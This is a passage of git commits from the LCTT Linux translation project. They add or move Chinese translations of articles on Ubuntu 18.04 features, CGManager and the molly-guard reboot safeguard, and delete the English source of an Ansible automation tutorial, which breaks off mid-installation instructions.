-校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:thishosting.rocks -[1]:https://thishosting.rocks/category/knowledgebase/ -[2]:https://thishosting.rocks/go/vultr/ -[3]:https://thishosting.rocks/go/vultr/ -[4]:https://thishosting.rocks/category/knowledgebase/ -[5]:https://thishosting.rocks/tag/ubuntu/ -[6]:https://thishosting.rocks/2017/12/05/ -[7]:https://www.google.com/get/noto/help/emoji/ -[8]:https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg -[9]:https://community.ubuntu.com/t/call-for-participation-an-ubuntu-default-theme-lead-by-the-community/1545 -[10]:http://www.omgubuntu.co.uk/2017/11/suru-default-icon-theme-ubuntu-18-04-lts -[11]:https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg -[12]:https://www.ubuntu.com/download -[13]:http://cdimage.ubuntu.com/daily-live/current/ -[14]:https://www.virtualbox.org/ -[15]:https://thishosting.rocks/go/vultr/ -[16]:https://thishosting.rocks/vultr-coupons-for-2017-free-credits-and-more/ -[17]:https://thishosting.rocks/best-lightweight-linux-distros/ diff --git a/translated/tech/20171205 Ubuntu 18.04 – New Features.md b/translated/tech/20171205 Ubuntu 18.04 – New Features.md new file mode 100644 index 0000000000..7c91177850 --- /dev/null +++ b/translated/tech/20171205 Ubuntu 18.04 – New Features.md @@ -0,0 +1,159 @@ +Ubuntu 18.04 – 新功能,发行日期和更多信息 +============================================================ + + +我们一直都在翘首以盼 - 新的 Ubuntu 的 LTS 版本 - 18.04。了解有关新功能,发行日期以及更多信息。 + +> 提示:我们将经常在这篇文章中更新新的信息,所以请为此页面添加书签,然后再回来查看。 + +### 关于 Ubuntu 18.04 的基本信息 + +让我们以一些基本信息开始。 + +* 这是一个新的 LTS(Long Term Support)版本。所以你得到了对桌面版和服务器版 5 年的支持。 + +* 被命名为“Bionic Beaver”(仿生狐狸)。Canonical 的创始人 Mark Shuttleworth 解释了这个名字背后的含义。吉祥物是一个海狸,因为它充满活力,勤劳,并且是一个很棒工程师 - 这完美地描述了一个典型的 Ubuntu 用户,以及新的 Ubuntu 发行版本身。使用“Bionic”(仿生)这个形容词是由于在 Ubuntu Core 上运行的机器人数量的增加。 + +### Ubuntu 18.04 发行日期和日程 + +如果你是 Ubuntu 的新手,你可能并不熟悉实际的版本号意味着什么。它指的是官方发行的年份和月份。所以 Ubuntu 18.04 正式发布将在 2018 年的第 4 个月。Ubuntu 17.10 于 2017 年发布,也就是今年的第 10 个月。 + +对进一步的细节,这里是有关 Ubuntu 18.04 LTS 的重要日期和需要知道的: + +* 2017 年 11 月 30 日 - 功能定义冻结。 + +* 2018 年 1 月 4 日 - 第一个 Alpha 版本。所以,如果您选择接收新的 Alpha 版本,那么您将在这天获得 Alpha 1 更新。 + +* 2018 年 2 月 1 日 - 第二个 Alpha 版本。 + +* 2018 年 3 月 1 日 - 功能冻结。将不会引入或发布新功能。所以开发团队只会在改进现有功能和修复错误上努力。当然也有例外。如果您不是开发人员或有经验的用户,但仍想尝试新的 Ubuntu ASAP,那么我个人建议从此版本开始。 + +* 2018 年 3 月 8 日 - 第一次 Bata 版本。如果您选择接收 Bata 版更新,则会在当天得到更新。 + +* 2018 年 3 月 22 日 - 用户界面冻结。这意味着不会对实际的用户界面做进一步的更改或更新,因此,如果您编写文档,[教程][1],并使用屏幕截图,那时启动是安全的。 + +* 2018 年 3 月 29 日 - 文档字符串冻结。将不会有任何编辑或新的东西(字符串)添加到文档中,所以翻译者可以开始翻译文档。 + +* 2018 年 4 月 5 日 - 最终 Beta 版本。这也是开始使用新版本的好日子。 + +* 2018 年 4 月 19 日 - 最终冻结。现在一切都已经完成了。版本的图像被创建和分发,并且可能不会有任何更改。 + +* 2018 年 4 月 26 日 - 官方最终版本的 Ubuntu 18.04。每个人都应该从今天开始使用它,即使在生产服务器上。我们建议从[Vultr][2]获得 Ubuntu 18.04 服务器并测试新功能。[Vultr][3]的服务器每月起价为 2.5 美元。 + +### Ubuntu 18.04 的新功能 + +在 Ubuntu 18.04 LTS 上的所有新功能: + +### 彩色表情符号现已支持 + +在以前的版本中,Ubuntu 只支持单色(黑和白)表情符号,坦白地说,它看起来不是太好。Ubuntu 18.04 将使用[Noto Color Emoji font][7]来支持彩色表情符号。随着 18.04,你可以在任何地方轻松查看和添加颜色表情符号。他们是本地支持的 - 所以你可以使用它们,而不使用第三方应用程序或安装/配置任何额外的东西。你可以随时通过删除字体来禁用彩色表情符号。 + +### GNOME 桌面环境 + + [![ubuntu 17.10 gnome](https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg.webp)][8] + +Ubuntu 从 Ubuntu 17.10 开始使用的 GNOME 桌面环境,而不是默认的 Unity 环境。Ubuntu 18.04 将继续使用 GNOME。这是 Ubuntu 的一个重要的变化。 + +### Ubuntu 18.04 桌面将有一个新的默认主题 + +Ubuntu 18.04 正在用新的 GTK 主题以告别旧的默认主题 “Ambience”。如果你想帮助新的主题,看看一些截图甚至更多,去[这里][9]。 + +到目前为止,有人猜测 Suru 将成 为 Ubuntu 18.04 的[新默认图标主题][10]。这里有一个截图: + + [![suru icon theme ubuntu 18.04](https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg.webp)][11] + +> 值得注意的是:Ubuntu 16.10,17.04 和 17.10 中的所有新功能都将滚动到 Ubuntu 18.04 中。所以更新像右边的窗口按钮,更好的登录屏幕,改进的蓝牙支持等将推出到Ubuntu 18.04。我们不会包含一个特殊的部分,因为它对 Ubuntu 18.04 本身并不新鲜。如果您想了解更多关于从 16.04 到 18.04 的所有变化,请谷歌搜索它们之间的每个版本。 + +### 下载 Ubuntu 18.04 + +首先,如果你已经使用 Ubuntu,你可以升级到 Ubuntu 18.04。 + +如果你需要下载 Ubuntu 18.04: + +在最终发布之后,请进入[官方 Ubuntu 下载页面][12]。 + +对于每日构建(alpha,beta 和 non-final 版本),请转到[这里][13]。 + +### 常见问题解答 + +现在是一些经常被问到的问题(附带答案),这应该能给你关于这一切的更多信息。 + +### 什么时候切换到 Ubuntu 18.04 是安全的? + +当然是在正式的最终发布日期。但是,如果您等不及,请开始使用 2018 年 3 月 1 日的桌面版本,并在 2018 年 4 月 5 日开始测试服务器版本。但是为了确保安全,您需要等待最终发布,甚至更长时间,使得您正在使用的第三方服务和应用程序经过测试,并在新版本上进行良好运行。 + +### 如何将我的服务器升级到 Ubuntu 18.04? + +这个过程相当简单,但潜在风险很大。我们可能会在不久的将来发布一个教程,但你基本上需要使用‘do-release-upgrade’。同样,升级你的服务器也有潜在的风险,并且如果在生产服务器上,我会在升级之前再三考虑。特别是如果你在 16.04 上剩有几年的支持。 + +### 我怎样才能帮助 Ubuntu 18.04? + +即使您不是一个经验丰富的开发人员和 Ubuntu 用户,您仍然可以通过以下方式提供帮助: + +* 宣传它。让人们了解Ubuntu 18.04。在社交媒体上的一个简单的分享也有点帮助。 + +* 使用和测试版本。开始使用该版本并进行测试。同样,您不必是一个开发人员。您仍然可以查找和报告错误,或发送反馈。 + +* 翻译。加入翻译团队,开始翻译文档或应用程序。 + +* 帮助别人。加入一些在线 Ubuntu 社区,并帮助其他人解决他们对 Ubuntu 18.04 的问题。有时候人们需要帮助,一些简单的事如“我在哪里可以下载 Ubuntu?” + +### Ubuntu 18.04 对其他发行版如 Lubuntu 意味着什么? + +所有基于 Ubuntu 的发行版都将具有相似的新功能和类似的发行计划。你需要检查你的发行版的官方网站来获取更多信息。 + +### Ubuntu 18.04 是一个 LTS 版本吗? + +是的,Ubuntu 18.04 是一个 LTS(Long Term Support)版本,所以你将得到 5 年的支持。 + +### 我能从 Windows/OS X 切换到 Ubuntu 18.04 吗? + +当然可以!你很可能也会体验到性能的提升。从不同的操作系统切换到 Ubuntu 相当简单,有相当多的相关教程。你甚至可以设置一个双引导,来使用多个操作系统,所以 Windows 和 Ubuntu 18.04 你都可以使用。 + +### 我可以尝试 Ubuntu 18.04 而不安装它吗? + +当然。你可以使用像[VirtualBox][14]这样的东西来创建一个“虚拟桌面” - 你可以在你的本地机器上安装它,并且使用 Ubuntu 18.04 而不需要真正地安装 Ubuntu。 + +或者你可以在[Vultr][15]上以每月 2.5 美元的价格尝试 Ubuntu 18.04 服务器。如果你使用一些[免费账户(free credits)][16],那么它本质上是免费的。 + +### 为什么我找不到 Ubuntu 18.04 的 32 位版本? + +因为没有 32 位版本。Ubuntu的 17.10 版本放弃了 32 位版本。如果你使用的是旧硬件,那么最好使用不同的[轻量级Linux发行版][17]而不是 Ubuntu 18.04。 + +### 还有其他问题吗? + +在下面留言!分享您的想法,我们会非常激动,并且一旦有新信息发布,我们就会更新这篇文章。敬请期待,耐心等待! + +-------------------------------------------------------------------------------- + +via: https://thishosting.rocks/ubuntu-18-04-new-features-release-date/ + +作者:[ thishosting.rocks][a] +译者:[kimii](https://github.com/kimii) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:thishosting.rocks +[1]:https://thishosting.rocks/category/knowledgebase/ +[2]:https://thishosting.rocks/go/vultr/ +[3]:https://thishosting.rocks/go/vultr/ +[4]:https://thishosting.rocks/category/knowledgebase/ +[5]:https://thishosting.rocks/tag/ubuntu/ +[6]:https://thishosting.rocks/2017/12/05/ +[7]:https://www.google.com/get/noto/help/emoji/ +[8]:https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg +[9]:https://community.ubuntu.com/t/call-for-participation-an-ubuntu-default-theme-lead-by-the-community/1545 +[10]:http://www.omgubuntu.co.uk/2017/11/suru-default-icon-theme-ubuntu-18-04-lts +[11]:https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg +[12]:https://www.ubuntu.com/download +[13]:http://cdimage.ubuntu.com/daily-live/current/ +[14]:https://www.virtualbox.org/ +[15]:https://thishosting.rocks/go/vultr/ +[16]:https://thishosting.rocks/vultr-coupons-for-2017-free-credits-and-more/ +[17]:https://thishosting.rocks/best-lightweight-linux-distros/ + + + + + From 58164149f1aada3f9df1a43f2bfbbc0b0455769e Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 26 Dec 2017 09:10:03 +0800 Subject: [PATCH 0786/1627] translated --- ...w to find and tar files into a tar ball.md | 2 + sources/tech/20171218 Whats CGManager.md | 72 ------------------- 2 files changed, 2 insertions(+), 72 deletions(-) delete mode 100644 sources/tech/20171218 Whats CGManager.md diff --git a/sources/tech/20171215 How to find and tar files into a tar ball.md b/sources/tech/20171215 How to find and tar files into a tar ball.md index 06973ba243..fb6472e9bf 100644 --- a/sources/tech/20171215 How to find and tar files into a tar ball.md +++ b/sources/tech/20171215 How to find and tar files into a tar ball.md @@ -1,3 +1,5 @@ +translating----geekpi + How to find and tar files into a tar ball ====== diff --git a/sources/tech/20171218 Whats CGManager.md b/sources/tech/20171218 Whats CGManager.md deleted file mode 100644 index 9a1c25969e..0000000000 --- a/sources/tech/20171218 Whats CGManager.md +++ /dev/null @@ -1,72 +0,0 @@ -translating---geekpi - -What's CGManager?[][1] -============================================================ - -CGManager is a central privileged daemon that manages all your cgroups for you through a simple D-Bus API. It's designed to work with nested LXC containers as well as accepting unprivileged requests including resolving user namespaces UIDs/GIDs. - -# Components[][2] - -### cgmanager[][3] - -This daemon runs on the host, mounts cgroupfs into a separate mount namespace (so it's invisible from the host), binds /sys/fs/cgroup/cgmanager/sock for incoming D-Bus queries and generally handles all clients running directly on the host. - -cgmanager accepts both authentication requests using D-Bus + SCM credentials used for translation of uid, gid and pid across namespaces or using simple "unauthenticated" (just the initial ucred) D-Bus for queries coming from the host level. - -### cgproxy[][4] - -You may see this daemon run in two cases. On the host if your kernel is older than 3.8 (doesn't have pidns attach support) or in containers (where only cgproxy runs). - -cgproxy doesn't itself do any cgroup configuration change but instead as its name indicates, proxies requests to the main cgmanager process. - -This is necessary so a process may talk to /sys/fs/cgroup/cgmanager/sock using straight D-Bus (for example using dbus-send). - -cgproxy will then catch the ucred from that query and do an authenticated SCM query to the real cgmanager socket, passing the arguments through ucred structs so that they get properly translated into something cgmanager in the host namespace can understand. - -### cgm[][5] - -A simple command line tool which talks to the D-Bus service and lets you perform all the usual cgroup operations from the command line. - -# Communication protocol[][6] - -As mentioned above, cgmanager and cgproxy use D-Bus. It's recommended that external clients (so not cgproxy itself) use the standard D-Bus API and do not attempt to implement the SCM creds protocol as it's unnecessary and easy to get wrong. - -Instead, simply assume that talking to /sys/fs/cgroup/cgmanager/sock will always do the right thing. - -The cgmanager API is only available on that separate D-Bus socket, cgmanager itself doesn't attach to the system bus and so a running dbus daemon isn't a requirement of cgmanager/cgproxy. - -You can read more about the D-Bus API [here][7]. - -# Licensing[][8] - -CGManager is free software, most of the code is released under the terms of the GNU LGPLv2.1+ license, some binaries are released under the GNU GPLv2 license. - -The default license for the project is the GNU LGPLv2.1+. - -# Support[][9] - -CGManager's stable release support relies on the Linux distributions and their own commitment to pushing stable fixes and security updates. - -Commercial support for CGManager on Ubuntu LTS releases can be obtained from [Canonical Ltd][10]. - --------------------------------------------------------------------------------- - -via: https://linuxcontainers.org/cgmanager/introduction/ - -作者:[Canonical Ltd. ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.canonical.com/ -[1]:https://linuxcontainers.org/cgmanager/introduction/#whats-cgmanager -[2]:https://linuxcontainers.org/cgmanager/introduction/#components -[3]:https://linuxcontainers.org/cgmanager/introduction/#cgmanager -[4]:https://linuxcontainers.org/cgmanager/introduction/#cgproxy -[5]:https://linuxcontainers.org/cgmanager/introduction/#cgm -[6]:https://linuxcontainers.org/cgmanager/introduction/#communication-protocol -[7]:https://linuxcontainers.org/cgmanager/dbus-api/ -[8]:https://linuxcontainers.org/cgmanager/introduction/#licensing -[9]:https://linuxcontainers.org/cgmanager/introduction/#support -[10]:http://www.canonical.com/ From 17f8cbd0361b1952b95a65d4a99aba5dbce79775 Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 26 Dec 2017 09:10:45 +0800 Subject: [PATCH 0787/1627] translated --- translated/tech/20171218 Whats CGManager.md | 70 +++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 translated/tech/20171218 Whats CGManager.md diff --git a/translated/tech/20171218 Whats CGManager.md b/translated/tech/20171218 Whats CGManager.md new file mode 100644 index 0000000000..a21776eea7 --- /dev/null +++ b/translated/tech/20171218 Whats CGManager.md @@ -0,0 +1,70 @@ +什么是 CGManager?[][1] +============================================================ + +CGManager 是一个核心的特权守护进程,通过一个简单的 D-Bus API 管理你所有的 cgroup。它被设计用来处理嵌套的 LXC 容器以及接受无特权的请求,包括解析用户名称空间的 UID/GID。 + +# 组件[][2] + +### cgmanager[][3] + +这个守护进程在主机上运行,​​将 cgroupfs 挂载到一个独立的挂载名称空间(所以它不能从主机上看到),绑定 /sys/fs/cgroup/cgmanager/sock 用于传入的 D-Bus 查询,并通常处理主机上直接运行的所有客户端。 + +cgmanager 同时接受使用 D-Bus + SCM 凭证的身份验证请求,用于在命名空间之间转换 uid、gid 和 pid,或者使用简单的 “unauthenticated”(只是初始的 ucred)D-Bus 来查询来自主机级别的查询。 + +### cgproxy[][4] + +你可能会在两种情况下看到这个守护进程运行。在主机上,如果你的内核小于 3.8(没有 pidns 连接支持)或在容器中(只有 cgproxy 运行)。 + +cgproxy 本身并不做任何 cgroup 配置更改,而是如其名称所示,代理请求给主 cgmanager 进程。 + +这是必要的,所以一个进程可以直接使用 D-Bus(例如使用 dbus-send)与 /sys/fs/cgroup/cgmanager/sock 进行通信。 + +之后 cgproxy 将从该查询中得到 ucred,并对真正的 cgmanager 套接字进行经过身份验证的 SCM 查询,并通过 ucred 结构体传递参数,使它们能够正确地转换为 cgmanager 可以理解的主机命名空间 。 + +### cgm[][5] + +一个简单的命令行工具,与 D-Bus 服务通信,并允许你从命令行执行所有常见的 cgroup 操作。 + +# 通信协议[][6] + +如上所述,cgmanager 和 cgproxy 使用 D-Bus。建议外部客户端(所以不要是 cgproxy)使用标准的 D-Bus API,不要试图实现 SCM creds 协议,因为它是不必要的,并且容易出错。 + +相反,只要简单假设与 /sys/fs/cgroup/cgmanager/sock 的通信总是正确的。 + +cgmanager API 仅在独立的 D-Bus 套接字上可用,cgmanager 本身不连接到系统总线,所以 cgmanager/cgproxy 不要求有运行中的 dbus 守护进程。 + +你可以在[这里][7]阅读更多关于 D-Bus API。 + +# Licensing[][8] + +CGManager 是免费软件,大部分代码是根据 GNU LGPLv2.1+ 许可条款发布的,一些二进制文件是在 GNU GPLv2 许可下发布的。 + +该项目的默认许可证是 GNU LGPLv2.1+ + +# Support[][9] + +CGManager 的稳定版本支持依赖于 Linux 发行版以及它们自己承诺推出稳定修复和安全更新。 + +你可以从 [Canonical Ltd][10] 获得对 Ubuntu LTS 版本的 CGManager 的商业支持。 + +-------------------------------------------------------------------------------- + +via: https://linuxcontainers.org/cgmanager/introduction/ + +作者:[Canonical Ltd. ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.canonical.com/ +[1]:https://linuxcontainers.org/cgmanager/introduction/#whats-cgmanager +[2]:https://linuxcontainers.org/cgmanager/introduction/#components +[3]:https://linuxcontainers.org/cgmanager/introduction/#cgmanager +[4]:https://linuxcontainers.org/cgmanager/introduction/#cgproxy +[5]:https://linuxcontainers.org/cgmanager/introduction/#cgm +[6]:https://linuxcontainers.org/cgmanager/introduction/#communication-protocol +[7]:https://linuxcontainers.org/cgmanager/dbus-api/ +[8]:https://linuxcontainers.org/cgmanager/introduction/#licensing +[9]:https://linuxcontainers.org/cgmanager/introduction/#support +[10]:http://www.canonical.com/ From 6c367567e3edf573d5147fff9ae479cbe818f39e Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 26 Dec 2017 10:00:54 +0800 Subject: [PATCH 0788/1627] PRF&PUB:20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @lujun9972 https://linux.cn/article-9173-1.html --- ...ntal shutdowns-reboots with molly-guard.md | 43 ++++++++++++------- 1 file changed, 28 insertions(+), 15 deletions(-) rename {translated/tech => published}/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md (71%) diff --git a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/published/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md similarity index 71% rename from translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md rename to published/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md index db104d561e..81ea1729bc 100644 --- a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md +++ b/published/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @@ -1,45 +1,51 @@ 使用 molly-guard 保护你的 Linux/Unix 机器不会被错误地关机/重启 ====== -我去!又是这样。 我还以为我登录到家里的服务器呢。 结果 [重启的居然是数据库服务器 ][1]。 另外我也有时会在错误终端内输入 "[shutdown -h 0][2]" 命令。 我知道有些人 [经常会犯这个错误 ][3]。 -![我的愤怒无从容忍 ][4] + +我去!又是这样。 我还以为我登录到家里的服务器呢。 结果 [重启的居然是数据库服务器][1]。 另外我也有时会在错误终端内输入 "[shutdown -h 0][2]" 命令。 我知道有些人 [经常会犯这个错误 ][3]。 + +![我的愤怒无从容忍][4] + 有办法解决这个问题吗?我真的只能忍受这种随机重启和关机的痛苦吗? 虽说人总是要犯错的,但总不能一错再错吧。 最新我在 tweet 上发了一通牢骚: > 我总是一遍又一遍地犯下同样的错误 :( 本来应该输入: -> sudo virsh reboot d1 +> `sudo virsh reboot d1` > > 却总是输错重启了自己的电脑 -> sudo reboot d1 +> `sudo reboot d1` > > -- nixCraft (@nixcraft) [February 19,2017][5] - 结果收到了一些建议。我们来试一下。 ### 向你引荐 molly guard Molly-Guard **尝试阻止你不小心关闭或重启 Linux 服务器**。它在 Debian/Ubuntu 中的包描述为: -> 这个包会安装一个 shell 脚本来屏蔽已经存在的 shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* 命令。 molly-gurad 会首先运行一系列的脚本,只有在所有的脚本都返回成功的条件下, 才会调用真正的命令。 其中一个脚本会检查是否存在 SSH 会话。 如果是通过 SSH 会话调用的命令, shell 脚本会提示你输入相关闭主机的名称。 这应该足够防止你发生意外的关机或重启了。 +> 这个包会安装一个 shell 脚本来屏蔽现有的 `shutdown`/`reboot`/`halt`/`poweroff`/`coldreboot`/`pm-hibernate`/`pm-suspend*` 命令。 `molly-gurad` 会首先运行一系列的脚本,只有在所有的脚本都返回成功的条件下, 才会调用真正的命令。 其中一个脚本会检查是否存在 SSH 会话。 如果是通过 SSH 会话调用的命令, shell 脚本会提示你输入相关闭主机的名称。 这应该足够防止你发生意外的关机或重启了。 -貌似 [molly-guard][6] 还是个专有名词: +貌似 [molly-guard][6] 还是个专有名词Jargon File: -> 一种用于防止由于笨拙或者不小心触碰道大红开关的屏障。最初指的临时盖在 IBM 4341 的大红按钮上的有机玻璃,因为有一个程序员蹒跚学步的女儿(名叫Molly)一天之内重启了它两次。 后来这个东西也被用来盖住磁盘和网络设备上的停止/重启按钮。在硬件目录中,你很少会看到 “guarded button” 这样无趣的描"。 +> 一种用于防止由于笨拙或者不小心触碰道大红开关的屏障。最初指的临时盖在 IBM 4341 的大红按钮上的有机玻璃,因为有一个程序员蹒跚学步的女儿(名叫 Molly)一天之内重启了它两次。 后来这个东西也被用来盖住磁盘和网络设备上的停止/重启按钮。在硬件目录中,你很少会看到 “guarded button” 这样无趣的描述"。 ### 如何安装 molly guard -使用 [apt-get command][7] 或者 [apt command][8] 来搜索并安装 molly-guard: +使用 [`apt-get` 命令][7] 或者 [`apt` 命令][8] 来搜索并安装 molly-guard: + ``` $ apt search molly-guard $ sudo apt-get install molly-guard ``` + 结果为: + [![Fig.01: Installing molly guard on Linux][9]][10] ### 测试一下 -输入 [reboot 命令 ][11] 和 shutdown 命令: +输入 [`reboot` 命令 ][11] 和 `shutdown` 命令: + ``` $ sudo reboot # reboot @@ -49,9 +55,13 @@ $ shutdown -h 0 ### sudo virsh reboot vm_name_here $ sudo reboot vm_name_here ``` + 结果为: + ![Fig.02: Molly guard saved my butt ;\)][12] -我超级喜欢 molly-guard。因此我将下行内容加入到 apt-debian-ubuntu-common.yml 文件中了: + +我超级喜欢 molly-guard。因此我将下行内容加入到 `apt-debian-ubuntu-common.yml` 文件中了: + ``` - apt: name: molly-guard @@ -60,7 +70,7 @@ $ sudo reboot vm_name_here 是的。我使用 Ansible 在所有的 Debian 和 Ubuntu 服务器上都自动安装上它了。 - **相关** : [My 10 UNIX Command Line Mistakes][13] +**相关** : [我的 10 大 UNIX 命令行错误][13] ### 如果我的 Linux 发行版或者 Unix 系统(比如 FreeBSD) 没有 molly-guard 怎么办呢? @@ -71,16 +81,19 @@ alias reboot = "echo 'Are you sure?' If so, run /sbin/reboot" alias shutdown = "echo 'Are you sure?' If so, run /sbin/shutdown" ``` -你也可以 [临时取消别名机制运行真正的命令 ][15]。比如要运行 reboot 可以这样: +你也可以 [临时取消别名机制运行真正的命令][15]。比如要运行 reboot 可以这样: + ``` # \reboot ``` + 或者 + ``` # /sbin/reboot ``` -另外你也可以写一个 [shell/perl/python 脚本来调用这些命令并要求 ][16] 确认 reboot/halt/shutdown 的选项。 +另外你也可以写一个 [shell/perl/python 脚本来调用这些命令并要求][16] 确认 `reboot`/`halt`/`shutdown` 的选项。 -------------------------------------------------------------------------------- @@ -88,7 +101,7 @@ via: https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines- 作者:[Vivek Gite][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 722dafb6eb9467d5613b0e2a314ba98c858e3b49 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 13:04:58 +0800 Subject: [PATCH 0789/1627] =?UTF-8?q?translate=20done=20at=202017=E5=B9=B4?= =?UTF-8?q?=2012=E6=9C=88=2026=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=8C=2013?= =?UTF-8?q?:04:57=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ystem administration tasks with Ansible.md | 298 ------------------ ...ystem administration tasks with Ansible.md | 297 +++++++++++++++++ 2 files changed, 297 insertions(+), 298 deletions(-) delete mode 100644 sources/tech/20170724 How to automate your system administration tasks with Ansible.md create mode 100644 translated/tech/20170724 How to automate your system administration tasks with Ansible.md diff --git a/sources/tech/20170724 How to automate your system administration tasks with Ansible.md b/sources/tech/20170724 How to automate your system administration tasks with Ansible.md deleted file mode 100644 index abe565e8ae..0000000000 --- a/sources/tech/20170724 How to automate your system administration tasks with Ansible.md +++ /dev/null @@ -1,298 +0,0 @@ -translating by lujun9972 -How to automate your system administration tasks with Ansible -====== -![配图][https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_google_wave.png?itok=2oh8TpUi] -Do you want to sharpen your system administration or Linux skills? Perhaps you have some stuff running on your local LAN and you want to make your life easier--where do you begin? In this article, I'll explain how to set up tooling to simplify administering multiple machines. - -When it comes to remote administration tools, SaltStack, Puppet, Chef, and [Ansible][1] are a few popular options. Throughout this article, I'll focus on Ansible and explain how it can be helpful whether you have 5 virtual machines or a 1,000. - -Our journey begins with the basic administration of multiple machines, whether they are virtual or physical. I will assume you have an idea of what you want to achieve, and basic Linux administration skills (or at least the ability to look up the steps required to perform each task). I will show you how to use the tools, and it is up to you to decide what to do with them. - -### What is Ansible? - -The Ansible website explains the project as "a radically simple IT automation engine that automates cloud provisioning, configuration management, application deployment, intra-service orchestration, and many other IT needs." Ansible can be used to perform the same tasks across a defined set of servers from a centralized location. - -If you are familiar with Bash for-loops, you'll find that Ansible operates in a similar fashion. The difference, however, is that Ansible is _idempotent_. In layman's terms this means that generally Ansible only performs the requested action if a change will occur as a result. For example, if you were to perform a Bash for-loop to create a user across all of your machines, it may look something like this: -``` -for server in serverA serverB serverC; do ssh ${server} "useradd myuser"; done -``` - -This would create **myuser** on **serverA** , **serverB** , and **serverC** ; however, it would run the **user add** command every single time the for-loop was run, whether or not the user existed. An idempotent system will first check whether the user exists, and if it does not, the tool will create it. This is a simplified example, of course, but the benefits of an idempotent tool will become more clear over time. - -#### How does Ansible work? - -Ansible translates _Ansible playbooks_ into commands that are run over SSH, which has several benefits when it comes to managing Unix-like environments: - - 1. Most, if not all of the Unix-like machines you are administering will have SSH running by default. - 2. Relying on SSH means that no agent is required on the remote host. - 3. In most cases no additional software needs to be installed as Ansible requires Python 2.6 in order to operate. Most, if not all distributions of Linux have this version (or greater) installed by default. - 4. Ansible does not require a _master_ node. It can be run from any host that has the Ansible package installed and sufficient SSH access. - 5. Although running Ansible in a cron job is possible, by default Ansible only runs when you tell it to. - - - -#### Setting up SSH key authentication - -A common method for using Ansible is to set up passwordless SSH keys to facilitate ease of management. (Using Ansible Vault for passwords and other sensitive information is possible, but is outside the scope of this article.) For now, simply generate an SSH key with the following command as shown in Example 1. - -##### Example 1: Generating An SSH Key -``` -[09:44 user ~]$ ssh-keygen -Generating public/private rsa key pair. -Enter file in which to save the key (/home/user/.ssh/id_rsa): -Created directory '/home/user/.ssh'. -Enter passphrase (empty for no passphrase): -Enter same passphrase again: -Your identification has been saved in /home/user/.ssh/id_rsa. -Your public key has been saved in /home/user/.ssh/id_rsa.pub. -The key fingerprint is: -SHA256:TpMyzf4qGqXmx3aqZijVv7vO9zGnVXsh6dPbXAZ+LUQ user@user-fedora -The key's randomart image is: -+---[RSA 2048]----+ -| | -| | -| E | -| o . .. | -| . + S o+. | -| . .o * . .+ooo| -| . .+o o o oo+.*| -|. .ooo* o. * .*+| -| . o+*BO.o+ .o| -+----[SHA256]-----+ -``` - -In Example 1, the _Enter_ key is used to accept the defaults. An SSH key can be generated by any unprivileged user and installed in any user's SSH **authorized_keys** file on the remote system. After the key has been generated, it will need to be copied to a remote host. To do so, run the following command: -``` -ssh-copy-id root@servera -``` - - _Note: Ansible does not require root access; however, if you choose to use a non-root user, you_ must _configure the appropriate **sudo** permissions for the tasks you want to accomplish._ - -You will be prompted for the root password for **servera** , which will allow your SSH key to be installed on the remote host. After the initial installation of the SSH key, you will no longer be prompted for the root password on the remote host when logging in over SSH. - -### Installing Ansible - -The installation of the Ansible package is only required on the host that generated the SSH key in Example 1. If you are running Fedora, you can issue the following command: -``` -sudo dnf install ansible -y -``` - -If you run CentOS, you need to configure Extra Packages for Enterprise Linux (EPEL) repositories: -``` -sudo yum install epel-release -y -``` - -Then you can install Ansible with yum: -``` -sudo yum install ansible -y -``` - -For Ubuntu-based systems, you can install Ansible from the PPA: -``` -sudo apt-get install software-properties-common -y -sudo apt-add-repository ppa:ansible/ansible -sudo apt-get update -sudo apt-get install ansible -y -``` - -If you are using macOS, the recommended installation is done via Python PIP: -``` -sudo pip install ansible -``` - -See the [Ansible installation documentation][2] for 